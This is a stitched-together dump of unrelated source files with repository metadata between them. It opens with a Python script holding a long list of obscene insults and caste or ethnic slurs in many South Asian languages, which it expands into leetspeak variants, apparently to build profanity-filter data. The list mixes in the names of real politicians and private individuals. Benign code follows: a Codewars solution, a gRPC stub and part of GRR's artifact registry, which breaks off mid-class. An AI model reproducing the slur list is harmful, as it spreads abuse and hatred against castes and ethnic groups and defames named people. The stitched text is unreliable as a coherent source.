tuzya aaicha foda
tuzya aaicha lavda
tuzya aaichi gand
tuzya aaichi pucchi
tuzya aaichya gandit mungya
tuzya aaichya pucchila chavla kutra
tuzya aaichya pucchila chavla sap
tuzya aaila zavla kala kutra
Tuzya aii zavneya tuzya baapla
Tuzya bapacha pay adakla sandasat.
Tuzya gaandit paay
Yadzava
yadzavya
Yeda lavdya
zavadya
Zavkhor
zavnya
Adarsha
Bandar Ko Chaak
beshya
Bhalu
bhalu ko poi
Bhalu lai chik muji
chaak ko pwal
chahk
chahk ko dulka
chak cha
Chaman
Chick-day
Chickne
condo
condo hannay
Dhoti
dudh
fushi kha
Gadha
gand faat cha
Geda
Gidi Haps
goo kha
Goo kha
goo khai-ra morr
Gula chus randi
gula kha
Jantha
Kando
Kangres
Kukkur
kukur chikni
laando kha
lado
Lado
Lado chus
lado cocha
Lado kha
Lado ko tuppo
lamto
Lang Lang
ma shaala
maa chikney!
Maa chikni
Maa Rondi!
Machikne
Madhesi
mandale
maobadi
mero fushi kha
moot
mootday
moreko
moreko manchi
Morr Sali Morr!
morryo
Mugi
Muji
murda
muzy
pahadi
pinko
Prachanda
Puti Chat Chu
puti kha
puti ko jhol
Putin Chaat
radi ko puti
Randi ko baan
Randi ko Ban
randi ko choro
randiko choro
sungghur
turi tauke
Tutturay
ABHADRA
Baanda
Bada bou ghia
banda
Banda
banda chhod
Banda mundi
BARBARA
Batakara (pela)
bedha bia
Bedha toka
Bedha Toke
bedhei
Bedhei pua
bhauni giha
bia fata mada
bia ku darkar jaghanya gihan
Biaa
Bija
Biya chudi
Bujula
chodipua
chukiba
dana
Faizan
fusa chata
fusa kura
Gaandiaa
gandi
Gandi gia
Gandi Mara Sankara
Gandire Banda
Gayee de
gehiba
Ghoda Gehin Pua
Ghoda Ghein Bedha Toke
Ghusuri ghiaa
Goola gandha
gosti gian
Guola
Hagura magia
Han ta nalire goithe
hinjada
hinjida
Laathi biya re kaathi
Maa bia ra pua
Maa ghia
Maa gia
maagya
madarchaut
Mankada ghiya
mankada giha
mo priya ra bia re lagichi nia!!!!!
Mo Priya ra Gandi re Niya
Moro banda chaape
Mu tomo bhallo pauchu
Muuthi mara magia
naani bia re ghian
Nanna gia
PASANDA
Pela
Pela phata maada
pelei pua
Pelei pua
Pelei Puo
PUDI
randa (Pronounce Ra as robbery not as rabbit
Randa ku banda dhamakani
Randi puo
senti
Senti
Tate Gehibi
Thoola phata maada
To bhauni bia re ghia
To bou BIA
To Gandire Ghien
To Gandire Mo Banda
To Maa Bia re ghein
To Maa Biya Re Ghen
To maa ku gihe
to maa ku kukur gaheun
To Maipa Biaare gihen
To Maipa Biaare Gihen
To Maipa Gandi maribi
To Maipa Gandire gihen
bakvas
bhen chod
Choohi
Fudu
Haram Jaada
kalan
kudi chod
Kuri yani
kuri yawa
Kuthe Di Poosh
Kuthe Kambakhte
Laaaaauvre
Lan di Jhoon
lun tay charja
Lun te Waj
Momay
Pan chod
peyu di gand vich ungal
Phuddy
soor da lora
teri maa di fudi
Teri paan di chiter
Teri pan di lun
tutoo
Tutti
Bagul butcha
Bewakoof
Bhen da shola
Bhen Da Yaar
Bhenchod
Bhenchode
bhonsdu
Bibi di fudi
bokki
Bondu
bondu
bund
Bund
bund de
Bund Mara
Bund marr
chaval
Chitta Bander / Kalla Bander
Chitterchort
choos mera badaam
chutha
Chutiyaa
chuttiya
dallah
Dhila lan de padiash
Fooduu
fuddi hayon da
fudi
Fudi chut
Fudi da tataa
fudi fry karna
fudi hyounda
gand
gandu
Gandu
ganndu
Gashti
ghashti
haram da
harami saale
Haramjada
Jaa apne braah nu chod laa
kala lulla pi
kanjar
Kanjar
Kanjari
Kenjer
Khota
kissey kuti ma da puttar
Klatch
Kuta
kuta
Kutha
kuthay da puthar
Kuthi
kuti
Laan tare mow nee
lan chat
lan choos
Lauda
Lul
lula bahonder tup
lula chooshe
Lun
Lun choos
Lun Chung
Lun kurra how gaya
lun te charrh
Lund
Lund Chuss
Lunni
Ma chod
ma di podi
maa-jhouda
Maan Da Yaar
MaanChod
Mamai
Mamai Chuss
mamai patta
mango
mao ni puddi
matarchod
Mau ni yakk
Meh tera tueh vich aangliyan devan
Menu zor nal lan mar
Mera lan sakht ah
Mera lan tera tueh ki paarsi
Mera lun choos ta aangly mar
mera lund teri bund de betch
mere lund tey charr ke nach!
Meri Tutti Kha
Mume
Muth Maar
nuts ko suck kurrow
pad mar
Pan da yaar
Panchod salaa
Peshaab
phen chodtha
poo
Pud
Puddu
Pudhi avandeya
Pudi
randi
soor
Tatte
tatte chaude
tatte fad lo
tatte hayon da
taxi
Teri Bhen Dee Fuddi Mari
teri bhen di ghusi
teri bund ch lakad
Teri bund marni aa
teri fudi wich lul marya
Teri ma da ghusa
Teri ma di khali phudi
Teri ma the fudi
teri maa da fudda
teri maa da posrha
Teri maa dai ccholay
teri maa dee tutee swaad ya
Teri maa di gandi phuddi
Teri Maa Di Koosii Kay Uppar !
teri maa di pudi vich lath
teri maa nu lund
Teri Maan Dee Fuddi Mari
teri paan dee lund
Teri paan di fudi parrne
teri paen nu lan
Teri pain dha pahraya hoya phudda
teri pen da pudda
terri ma di fuid parne
topa
Topa
Topa te beja
Tu Bhen Da Yaar
Tu Maan Da Yaar
tu vich leni daa.
Tutta
Tuttay
Guddha naku
Guddha pagala dengutha
aathulu
aathulu peeku
aathulu peekutha
Aati Mokka
akka bokka lO naa sulla
akka nee pooku dengutha
amma pooku ki baanisa
amma pooku lo arati pandu
ATTHA POOKU DENGINA ALLDU
bochu
Bosudi
chilipiga thittatam
Chitthu Pooka
Dengithe dayyalu pudatai
Dengu
doola lanja
Gaadida Pichaloda
Gaja madda
golli cheeku ra kodaka
golli chekutha lanja
Gudda
gudda
gudda naaku
Hasta Prayogam chai
Jinniappa
kammani pooku
Kojja
Konamodda
kukka -pooka
kukka sulli
Kuthuru vongudu..alludu dhengudu
LANGA VIPPAVAE LANJAA
lanja
lanja - kodka
Lanja munda
lanja pooka
Lanjakodka
Marmangam
Modda
modda cheeku lanja
MODDA KUDUVU
modda naaku
modda notlo petti dengutha
modda, lavada, daddu, magatanam
muchchika, chanu mona
muddy lo velu petuko
naa modda gudu
Ne akka nu denga
ne akkan ma kukka dengha
Ne amma pukkulo naa modda
ne jathini kukka denga
ne notlo naa suli
Ne pookula na sulli
Nee aali pookulo Rampam
NEE AKKAANI DENGAA
nee akkanu denga
NEE ALINI DENGAA
nee amma guddani denga
nee amma kuttani denga
Nee amma roju na modda cheekuthundi
NEE AMMANI DENGAA
nee ammanu denga
nee ammanu dnegu
nee kooturu ni denga
nee notlo naa sulli
nee pallu super
nee pellaanni denga
nee pooku chekutha
nee pukulo naa sulli
Ni akkani pandulu denga
Ni pukla na madda
nihar
Nihar (or) banda pooku
ninnu dengutha
Nuvvu nee yendipoyina sulli
PEDDA SALLADHI
Pichi Pukoda
Pichi Pukudaana
Poi voungu ra
Pooku
pooku
pooku, dimma, pappa, bokka
Poooku chinchu
pukku naaku
Puku Peka adistha
puthhi
sachinoda
sallu dengutha
SANALO BOCHHO
shaata
Sravan (or) konda verri pooku
sulii
Sulli pattu
Teja (or) adivi pooku
Teja trivikram (or) adivi pooku
thurku valagodtha
Vattakai
vattalu
Vedhava
verri puka
vongo petti dengutha lanja
aaja choos mera lurs
Aap ka aana
apna lun cuti shur
Balal, mera noonoo na choop se
Behn ki chutar
Bhadwe Ki Nasal
bhai chode
Bhen chot
Bhen ke lorray
bosard chodi kay
Bund ke Biryani
chatt merai tattai
Choom meri Gaand
Choos Mera Lora
chooth kay pakoray
choti se luli
Chupa la lay
Chut ke chatney
dalla
dari moni pudi mari
deli mali guti
doe dolla raandee
Duffah oja
eik dolla raande
gaand chamchi
gaand ka bukhaar
Gaddha
ghandoo
Ghasti Kay Bachay
haraam salle
Haraamzada
Haraamzadi
haram salla
jhaant kay baal
kaala bandar
Kamina
kanjeri kay bachay
Khuss madri kay
kute liche ho chublo
kutee chode
kutta
Kuttay ka bacha
kutte ka ghanta
Kutti
kutti ka bacha
lalchi kutte kaa bacha
Lola/Lula
looly
lora le kay nach mera
Lula mu ki lan
lulmuah
Lun Chuse
Lund Pe Charh
Maan Chod
Maan kay laurday
madarugly
Mather chot
Mayyaada
meera loora choo so
meli mali guta
mera laan choop
monney podey
moomeh
muth ki malai
Myyaada
pancho
peasah nah mahr
Phudi
poody
Randee ka bacha
Randi ki nasal
rundi ka bacha
Shudra Lund
Tamil Lund
tari beh na puda paarsan
Tattay chooso
tattee choad
tere bhen meri chod hain
tere gand maroo
Teri Gaand Main Kutta Mutre
teri gand ma keera hai
teri gand mera lun hai
teri ma khuti
Teri Ma ki choot
Teri Ma Ko Kuttey Chodein
teri maa ki phudi
Toomaray tattay baraay pahraay heh
tu tho meri chod ki tara :P
Uloo Ki Pata
Uloo Ki Pati
ulu chod
abu gidir
Bazari
Bima khoigra
Bima khoygra
Bimani fishai
Bwitali
Cfa swlangra
Hinjao maogra (khoigra)
khilama
Khoynai
Lwdwi
Nwma shifa
Nwmani abu
Sifa gudung
Sifa jagra
sifa jagra
Sifa swlagra
Sikwmwn
maari tatoori ne chalay
Akbaruddin Owaisi
Alloo Bhosri Chaat
Anuj
Babhuchak
bai no bhosdo
bein chod
Benchod
Bhadvo
bhenchod
Bhoot
Bhopa
Bhos marina
Bhosad Pappu
bhosdo
bhosrini
bobla
Bobla Vagarni Baydi
Bosrichord
bosrina
Buckwass
Budhalal
chafu gaan
Chichi
Chod
Chod ami
Chodhru
chodkanya
Chodu
chupri lauri
Chutiya
Darshil
Dheela Lund Ni Olaad
Eapen
Fattu
gaan tari
Gaand Ghapli
Gaand Ma Ghal
gaandina, gandina
Gand nu kaanu
gandi chodina
gando
Gando salo
gel ghagharina
Ghel Chodyo
Ghelchoydi
Halki Raand na
Harsh Dalal
harshit
hopa
Huzefa
jaaro
Jhadhino!
Jignesh Mevani
karo loro
kem chho
kutari
Lakhota
Land
loda
lodde mari
Lowroh
luli
Lund Bhagat
Maa ne ghat bhosdina
maajaddha
maari tatoori ooper bess
maasi chodamno
Madachod
madachod
mandi susee
Manik
mara man no lado
mari bhosri chaat
meri gaan chatt
Mohit
Moht
mota jijah
nago choido
Nakhodiya
Namuno
Narender Modi
pikina
Pikina
pim pim
poom poom
Priyanshu
puchi chod
Puti
raand
rumana
sali
salu gut`ti
Sandas
suwwar jewu dachu
taari bai no aghano
Taari ma parasevo tya-reh e tuti kareh che!
Tara baap ni gaan
Taree gaar ma lowroh
Taree Ghaar Ma Doh Ladah
tari bosri kaapi karwa
tari dagri
tari gaand mare karya kutra balada
tari gandayli kari koyli dagri
Tari ma na bubla sukai-gya
tari ma ne hadi kadhto hathi chode
tari ma ni putti
tari ma no poplo
Tari maa na babla chusu
Tari maa na bhosda ma maro lodo
Tari maa na modha ma maro lodo
Tari maa ne chodu
Tari maa ni taturi
tari mai ni gand
tari mani choot ma derka bole
Taro baap tane chadeche
tere ma nu hinta kar
teree maah gaderi
thari ma ne bozro maro loro nakhides
Thari Ma Ni Ghaan
Tusat
Tutelli nirodh no aulad
Andoo
behenien khe yahan
Bhairain jo yaar
Bharain khe
Bharvo
Bhavesh
Bhen ja chud
Bherain khe
Budhi muhandro
Charyo
Chora
Chora / Chori
Chud
Chud Budhi jo
Chud muhandro
chutia
Chutoon
Dallo
gui jo tung
Guii / Gaand
Jadija
kakus
Kutey ja putta
lalli
Lun choop
Lun khao
Lun muhandro
Maa ja chud
maa ji teeta
Madar chot
Marhain jo yaar
Marhain khe
Marhen khe yahan
Mujhko aapka bur chahiye
neech
Pelo / Pela
Pelorray
Pirhain ji yaar
Pirhain ji yaar (adding "Jo" will make the Paramour masculine)
Pirhain khe
ran yadho
Ranayadha
Randi jo putr
Sagro muo
Teetay main
punda/pundai
poolu
ommapunda
thevdiyapaiya
okka/kokka
ommala oka
pundai
sunni
mayir/mayiru
oombu
kena pundai
akkula thukki kami di
kuthi
anaathai kaluthai
arivu ketta koothi
avuthu kami
baadu
chunni
ennoda poola oombuda
okka kudi
kaai
kaai adithal
kala viridi
ki adi
koothi mayir
kuthi kolutha thevdia
kuthia virikira thevdia
molaikku naduvule uttu okka
molaikku naduvule utu olu da
okkala ozhi
ommala oka
ommala
onkka pundek
kunju
panni
pavadaiyathukkikamidi
pisasu
poolu
pooluarunthapundamavan
puluthi
puluthi punda
puluthinapoolaumbudi
pundamavale
pundavaaya
pundaamavane
pundainakki
pundainakki
pundayenakku
soothu
suththu
sunni
sunniyaoombu
suthaa
thaiyoli
thangathevdia
thevidiya pulla
thevidiya mavale
thotha pundai
thevadiyamavan
thevdiyakuthi
thoomiyakudiki
thevdiyakuthileuttapoolu
thevdiyapaiya
thoronthukamidi
thukkikami
ungaaayakuthi
vaaila vaangu
vesi
viruchu kaami
arippueduthakuthimavale
auvusaarikoodi
gajakkol
kalaiviridi
kandaaraoli
karungkuthimavale
keeshanappa
kenapunda
koodhi
koodhipayale
koothinuckie
kudiyabaadu
kundi
kundimudi
kunjipayalae
kusukoodhi
kuthimudiyathadavikamidi
loosukoodhi
mairupudungi
malamattupunda
mayirupoodunghi
molasappi
mollamaari
monnanaaye
mairaandi
muttaakoodhi
naarakoodhi
pudungi
nayeesoothileunkunji
oakkauttabaadu
okkalaoli
olithebengali
olmaari
oluthapundai
ongappanpundai
oogili
oombu
oora otha thevidiya
oorthevidya
oka
oththa
oolu
kuthi
paepunda
kenakuthi
potta punda
parapundamaune
padukka pottu okka
parathesi punda
patchathevidiya
pochu pundai
pochchu
poolpayya
poolu
thevudiya
avusaari
pullusappi
puluthi
pundamavanae
pula chappu
pula umbu
oththa punda
sakkiliakoodhi
sappi
selayaithukkudi
vaaila vachuruven
sunniya umbu
pundaiya moodu
mola
molai
thevdiya
thevidiya
thevidiyapundai
molaya amukava
naara punda
okkala okka
vailevatchuko
ommala pottu okka
monna pundai
kai mutti
para punda
ommala okka
kai adiki
munda kalappa
otha
vaaila vaangu
arivu ketta mundam
Baah Khuwa
Baal
baal kela
baal khuruwa
baaperor konitu
baaperor pukorkhon
Bal
Bandor Chod
Bari
Bengena Mora
billa suda
bimakho khoigra
boinaak sudaai
boiner lalak
boithali
buch seleka
Bush
Bush mara
Bushot tel diya
Chet
ekka she duuka
fifa ni lodoi
Fuck Dang Fo!
gar mora
Gida
Gida Khua
Gu
Gu Khuwa
guu kha
guu kha mokkel
Jairir badcha
Jhaant singa
johoni jua
Johora
Jonghol
Kela
Keti
Koti Mara
Kotit bari homai dim
Kukur'or puwali
laura
Lauri ke bal
Lothou Guti
Ludoi
Maaeror Boos, maksudai
Maaeror fof khon
maak sudai
Maaror bhumikhon kela
maka dingding
maka linglang
Maksaai
mangmarani
Meeyarek Kohai
Mumu
Nagori putek
Naliya
Pel suha
Pheda cheleka
Pokorot Kothal Bhoram
pukor selek
raandii
Randir soli
Rendi Dallal
Rendir Beta
Rendy Suda
Set Suda
setor baal
sipha jagra
Sudasudi
Sudi Gida Falidim
Sudur Bhai
sut marani
syetor moila
Tez piya
Tumak sudibor mon goise
tur maak sudu
Tur Maak Sudu
Tur maraok rastat kukur logi sudam..
"""
words = s.split('\n')
for word in words:
    print(word)
    lst.append(Leet2Combos(word))
k = pd.DataFrame(lst)
k.to_csv("leet Lol.csv")
k.head()
del k
print(word)
clear_output(wait=True)
i+=1
print(i)
| 13.117534
| 87
| 0.812241
|
0152fc835f369302f2e9e9902f7a71cec72cc7bc
| 329
|
py
|
Python
|
Codewars_Python/CodeGolf/jaden_casing_strings_7_kyu.py
|
nlantau/Codewars_2020_2021
|
055fbf8785ddd52b9f8e8c2b59294ead01852467
|
[
"MIT"
] | null | null | null |
Codewars_Python/CodeGolf/jaden_casing_strings_7_kyu.py
|
nlantau/Codewars_2020_2021
|
055fbf8785ddd52b9f8e8c2b59294ead01852467
|
[
"MIT"
] | null | null | null |
Codewars_Python/CodeGolf/jaden_casing_strings_7_kyu.py
|
nlantau/Codewars_2020_2021
|
055fbf8785ddd52b9f8e8c2b59294ead01852467
|
[
"MIT"
] | null | null | null |
# nlantau, 2021-10-10
"""
quote = "How can mirrors be real if our eyes aren't real"
test.assert_equals(to_jaden_case(quote), "How Can Mirrors Be Real If Our Eyes Aren't Real")
"""
a="How can mirrors be real if our eyes aren't real"
to_jaden_case=lambda a:' '.join(w[0].upper()+w[1:] for w in a.split())
print(to_jaden_case(a))
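# Illustrative note (not part of the original solution): str.title() would not work here
# because it also capitalizes the letter after an apostrophe, e.g.
#   "aren't".title()  # -> "Aren'T"
# which is why the lambda upper-cases only the first character of each word.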
| 29.909091
| 91
| 0.702128
|
1c098f9b0b0dec57051b70f799973534a33efdc5
| 2,414
|
py
|
Python
|
nlp/zemberek/preprocess_pb2_grpc.py
|
fatihint/lugatrap
|
868bd34517eb325591eba96af8176bc4ad5b0fb6
|
[
"Apache-2.0"
] | 1
|
2021-04-15T16:16:10.000Z
|
2021-04-15T16:16:10.000Z
|
nlp/zemberek/preprocess_pb2_grpc.py
|
fatihint/lugatrap
|
868bd34517eb325591eba96af8176bc4ad5b0fb6
|
[
"Apache-2.0"
] | 1
|
2021-11-04T18:48:01.000Z
|
2021-11-04T18:48:01.000Z
|
nlp/zemberek/preprocess_pb2_grpc.py
|
fatihint/lugatrap
|
868bd34517eb325591eba96af8176bc4ad5b0fb6
|
[
"Apache-2.0"
] | null | null | null |
# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
import grpc
from . import preprocess_pb2 as preprocess__pb2
class PreprocessingServiceStub(object):
# missing associated documentation comment in .proto file
pass
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.Tokenize = channel.unary_unary(
'/zemberek.preprocessor.PreprocessingService/Tokenize',
request_serializer=preprocess__pb2.TokenizationRequest.SerializeToString,
response_deserializer=preprocess__pb2.TokenizationResponse.FromString,
)
self.ExtractSentences = channel.unary_unary(
'/zemberek.preprocessor.PreprocessingService/ExtractSentences',
request_serializer=preprocess__pb2.SentenceExtractionRequest.SerializeToString,
response_deserializer=preprocess__pb2.SentenceExtractionResponse.FromString,
)
class PreprocessingServiceServicer(object):
# missing associated documentation comment in .proto file
pass
def Tokenize(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ExtractSentences(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_PreprocessingServiceServicer_to_server(servicer, server):
rpc_method_handlers = {
'Tokenize': grpc.unary_unary_rpc_method_handler(
servicer.Tokenize,
request_deserializer=preprocess__pb2.TokenizationRequest.FromString,
response_serializer=preprocess__pb2.TokenizationResponse.SerializeToString,
),
'ExtractSentences': grpc.unary_unary_rpc_method_handler(
servicer.ExtractSentences,
request_deserializer=preprocess__pb2.SentenceExtractionRequest.FromString,
response_serializer=preprocess__pb2.SentenceExtractionResponse.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'zemberek.preprocessor.PreprocessingService', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
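# --- Illustrative usage sketch (not part of the generated stub) ---
# A minimal client call, kept as comments because this file is generated code.
# The server address and the TokenizationRequest field name `input` are assumptions,
# not taken from the .proto definition shown here.
#
#   channel = grpc.insecure_channel('localhost:6789')
#   stub = PreprocessingServiceStub(channel)
#   response = stub.Tokenize(preprocess__pb2.TokenizationRequest(input='Merhaba dunya'))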
| 37.71875
| 91
| 0.769677
|
b12013c44a913bdefba7c7fd2ec22726a76fac2b
| 24,741
|
py
|
Python
|
grr/server/grr_response_server/artifact_registry.py
|
BA7JCM/grr
|
c6f3b19e73e1d76a195d3c9a63e894ace6ea2508
|
[
"Apache-2.0"
] | null | null | null |
grr/server/grr_response_server/artifact_registry.py
|
BA7JCM/grr
|
c6f3b19e73e1d76a195d3c9a63e894ace6ea2508
|
[
"Apache-2.0"
] | null | null | null |
grr/server/grr_response_server/artifact_registry.py
|
BA7JCM/grr
|
c6f3b19e73e1d76a195d3c9a63e894ace6ea2508
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
"""Central registry for artifacts."""
import io
import logging
import os
import threading
from grr_response_core import config
from grr_response_core.lib import artifact_utils
from grr_response_core.lib import objectfilter
from grr_response_core.lib import parsers
from grr_response_core.lib import type_info
from grr_response_core.lib import utils
from grr_response_core.lib.rdfvalues import artifacts as rdf_artifacts
from grr_response_core.lib.rdfvalues import client as rdf_client
from grr_response_core.lib.util.compat import yaml
from grr_response_server import data_store
# Names of fields that should no longer be used but might occur in old artifact
# files.
DEPRECATED_ARTIFACT_FIELDS = frozenset([
"labels",
])
class ArtifactRegistrySources(object):
"""Represents sources of the artifact registry used for getting artifacts."""
def __init__(self):
self._dirs = set()
self._files = set()
def AddDir(self, dirpath):
"""Adds a directory path as a source.
Args:
dirpath: a string representing a path to the directory.
Returns:
True if the directory is not an already existing source.
"""
if dirpath not in self._dirs:
self._dirs.add(dirpath)
return True
return False
def AddFile(self, filepath):
"""Adds a file path as a source.
Args:
filepath: a string representing a path to the file.
Returns:
True if the file is not an already existing source.
"""
if filepath not in self._files:
self._files.add(filepath)
return True
return False
def Clear(self):
self._dirs.clear()
self._files.clear()
def GetDirs(self):
"""Returns an iterator over defined source directory paths."""
return iter(self._dirs)
def GetFiles(self):
"""Returns an iterator over defined source file paths."""
return iter(self._files)
def GetAllFiles(self):
"""Yields all defined source file paths.
This includes file paths defined directly and those defined implicitly by
defining a directory.
"""
for filepath in self._files:
yield filepath
for dirpath in self._dirs:
for filepath in ArtifactRegistrySources._GetDirYamlFiles(dirpath):
if filepath in self._files:
continue
yield filepath
@staticmethod
def _GetDirYamlFiles(dirpath):
try:
for filename in os.listdir(dirpath):
if filename.endswith(".json") or filename.endswith(".yaml"):
yield os.path.join(dirpath, filename)
except (IOError, OSError) as error:
logging.warning("problem with accessing artifact directory '%s': %s",
dirpath, error)
class ArtifactRegistry(object):
"""A global registry of artifacts."""
def __init__(self):
self._artifacts = {}
self._sources = ArtifactRegistrySources()
self._dirty = False
# Field required by the utils.Synchronized annotation.
self.lock = threading.RLock()
def _LoadArtifactsFromDatastore(self):
"""Load artifacts from the data store."""
loaded_artifacts = []
    # TODO(hanuszczak): Why do we have to remove anything? If some artifact
    # tries to shadow a system artifact, shouldn't we just ignore it and perhaps
# issue some warning instead? The datastore being loaded should be read-only
# during upload.
# A collection of artifacts that shadow system artifacts and need
# to be deleted from the data store.
to_delete = []
artifact_list = data_store.REL_DB.ReadAllArtifacts()
for artifact_value in artifact_list:
try:
self.RegisterArtifact(
artifact_value, source="datastore:", overwrite_if_exists=True)
loaded_artifacts.append(artifact_value)
except rdf_artifacts.ArtifactDefinitionError as e:
# TODO(hanuszczak): String matching on exception message is rarely
        # a good idea. Instead this should be refactored to some exception
# class and then handled separately.
if "system artifact" in str(e):
to_delete.append(artifact_value.name)
else:
raise
if to_delete:
DeleteArtifactsFromDatastore(to_delete, reload_artifacts=False)
self._dirty = True
# TODO(hanuszczak): This is connected to the previous TODO comment. Why
# do we throw exception at this point? Why do we delete something and then
# abort the whole upload procedure by throwing an exception?
detail = "system artifacts were shadowed and had to be deleted"
raise rdf_artifacts.ArtifactDefinitionError(to_delete, detail)
# Once all artifacts are loaded we can validate.
revalidate = True
while revalidate:
revalidate = False
for artifact_obj in loaded_artifacts[:]:
try:
Validate(artifact_obj)
except rdf_artifacts.ArtifactDefinitionError as e:
logging.error("Artifact %s did not validate: %s", artifact_obj.name,
e)
artifact_obj.error_message = str(e)
loaded_artifacts.remove(artifact_obj)
revalidate = True
# TODO(hanuszczak): This method should be a stand-alone function as it doesn't
# use the `self` parameter at all.
@utils.Synchronized
def ArtifactsFromYaml(self, yaml_content):
"""Get a list of Artifacts from yaml."""
raw_list = yaml.ParseMany(yaml_content)
# TODO(hanuszczak): I am very sceptical about that "doing the right thing"
# below. What are the real use cases?
# Try to do the right thing with json/yaml formatted as a list.
if (isinstance(raw_list, list) and len(raw_list) == 1 and
isinstance(raw_list[0], list)):
raw_list = raw_list[0]
# Convert json into artifact and validate.
valid_artifacts = []
for artifact_dict in raw_list:
# Old artifacts might still use deprecated fields, so we have to ignore
# such. Here, we simply delete keys from the dictionary as otherwise the
# RDF value constructor would raise on unknown fields.
for field in DEPRECATED_ARTIFACT_FIELDS:
artifact_dict.pop(field, None)
# In this case we are feeding parameters directly from potentially
# untrusted yaml/json to our RDFValue class. However, safe_load ensures
# these are all primitive types as long as there is no other
# deserialization involved, and we are passing these into protobuf
# primitive types.
try:
artifact_value = rdf_artifacts.Artifact(**artifact_dict)
valid_artifacts.append(artifact_value)
except (TypeError, AttributeError, type_info.TypeValueError) as e:
name = artifact_dict.get("name")
raise rdf_artifacts.ArtifactDefinitionError(
name, "invalid definition", cause=e)
return valid_artifacts
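  # Illustrative sketch (not part of the original module): a minimal YAML definition that
  # ArtifactsFromYaml above could parse. The concrete values are made up for illustration;
  # only the field names follow the artifact schema used elsewhere in this file.
  #
  #   name: ExampleArtifact
  #   doc: An example artifact definition.
  #   supported_os: [Windows]
  #   sources:
  #     - type: FILE
  #       attributes:
  #         paths: ['%%users.appdata%%\Mozilla']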
def _LoadArtifactsFromFiles(self, file_paths, overwrite_if_exists=True):
"""Load artifacts from file paths as json or yaml."""
loaded_files = []
loaded_artifacts = []
for file_path in file_paths:
try:
with io.open(file_path, mode="r", encoding="utf-8") as fh:
logging.debug("Loading artifacts from %s", file_path)
for artifact_val in self.ArtifactsFromYaml(fh.read()):
self.RegisterArtifact(
artifact_val,
source="file:%s" % file_path,
overwrite_if_exists=overwrite_if_exists)
loaded_artifacts.append(artifact_val)
logging.debug("Loaded artifact %s from %s", artifact_val.name,
file_path)
loaded_files.append(file_path)
except (IOError, OSError) as e:
logging.error("Failed to open artifact file %s. %s", file_path, e)
except rdf_artifacts.ArtifactDefinitionError as e:
logging.error("Invalid artifact found in file %s with error: %s",
file_path, e)
raise
# Once all artifacts are loaded we can validate.
for artifact_value in loaded_artifacts:
Validate(artifact_value)
@utils.Synchronized
def ClearSources(self):
self._sources.Clear()
self._dirty = True
@utils.Synchronized
def AddFileSource(self, filename):
self._dirty |= self._sources.AddFile(filename)
@utils.Synchronized
def AddDirSource(self, dirname):
self._dirty |= self._sources.AddDir(dirname)
@utils.Synchronized
def AddDirSources(self, dirnames):
for dirname in dirnames:
self.AddDirSource(dirname)
@utils.Synchronized
def AddDefaultSources(self):
for path in config.CONFIG["Artifacts.artifact_dirs"]:
self.AddDirSource(path)
@utils.Synchronized
def RegisterArtifact(self,
artifact_rdfvalue,
source="datastore",
overwrite_if_exists=False,
overwrite_system_artifacts=False):
"""Registers a new artifact."""
artifact_name = artifact_rdfvalue.name
if artifact_name in self._artifacts:
if not overwrite_if_exists:
details = "artifact already exists and `overwrite_if_exists` is unset"
raise rdf_artifacts.ArtifactDefinitionError(artifact_name, details)
elif not overwrite_system_artifacts:
artifact_obj = self._artifacts[artifact_name]
if not artifact_obj.loaded_from.startswith("datastore:"):
# This artifact was not uploaded to the datastore but came from a
# file, refuse to overwrite.
details = "system artifact cannot be overwritten"
raise rdf_artifacts.ArtifactDefinitionError(artifact_name, details)
# Preserve where the artifact was loaded from to help debugging.
artifact_rdfvalue.loaded_from = source
# Clear any stale errors.
artifact_rdfvalue.error_message = None
self._artifacts[artifact_rdfvalue.name] = artifact_rdfvalue
@utils.Synchronized
def UnregisterArtifact(self, artifact_name):
try:
del self._artifacts[artifact_name]
except KeyError:
raise ValueError("Artifact %s unknown." % artifact_name)
@utils.Synchronized
def ClearRegistry(self):
self._artifacts = {}
self._dirty = True
def _ReloadArtifacts(self):
"""Load artifacts from all sources."""
self._artifacts = {}
self._LoadArtifactsFromFiles(self._sources.GetAllFiles())
self.ReloadDatastoreArtifacts()
def _UnregisterDatastoreArtifacts(self):
"""Remove artifacts that came from the datastore."""
to_remove = []
for name, artifact in self._artifacts.items():
if artifact.loaded_from.startswith("datastore"):
to_remove.append(name)
for key in to_remove:
self._artifacts.pop(key)
@utils.Synchronized
def ReloadDatastoreArtifacts(self):
# Make sure artifacts deleted by the UI don't reappear.
self._UnregisterDatastoreArtifacts()
self._LoadArtifactsFromDatastore()
def _CheckDirty(self, reload_datastore_artifacts=False):
if self._dirty:
self._dirty = False
self._ReloadArtifacts()
else:
if reload_datastore_artifacts:
self.ReloadDatastoreArtifacts()
@utils.Synchronized
def GetArtifacts(self,
os_name=None,
name_list=None,
source_type=None,
exclude_dependents=False,
provides=None,
reload_datastore_artifacts=False):
"""Retrieve artifact classes with optional filtering.
All filters must match for the artifact to be returned.
Args:
os_name: string to match against supported_os
name_list: list of strings to match against artifact names
source_type: rdf_artifacts.ArtifactSource.SourceType to match against
source_type
exclude_dependents: if true only artifacts with no dependencies will be
returned
provides: return the artifacts that provide these dependencies
reload_datastore_artifacts: If true, the data store sources are queried
for new artifacts.
Returns:
list of artifacts matching filter criteria
"""
self._CheckDirty(reload_datastore_artifacts=reload_datastore_artifacts)
results = {}
for artifact in self._artifacts.values():
# artifact.supported_os = [] matches all OSes
if os_name and artifact.supported_os and (
os_name not in artifact.supported_os):
continue
if name_list and artifact.name not in name_list:
continue
if source_type:
source_types = [c.type for c in artifact.sources]
if source_type not in source_types:
continue
if exclude_dependents and GetArtifactPathDependencies(artifact):
continue
if not provides:
results[artifact.name] = artifact
else:
        # This needs to remain the last test; if it matches, the result is added.
for provide_string in artifact.provides:
if provide_string in provides:
results[artifact.name] = artifact
break
return list(results.values())
@utils.Synchronized
def GetRegisteredArtifactNames(self):
return [str(x) for x in self._artifacts]
@utils.Synchronized
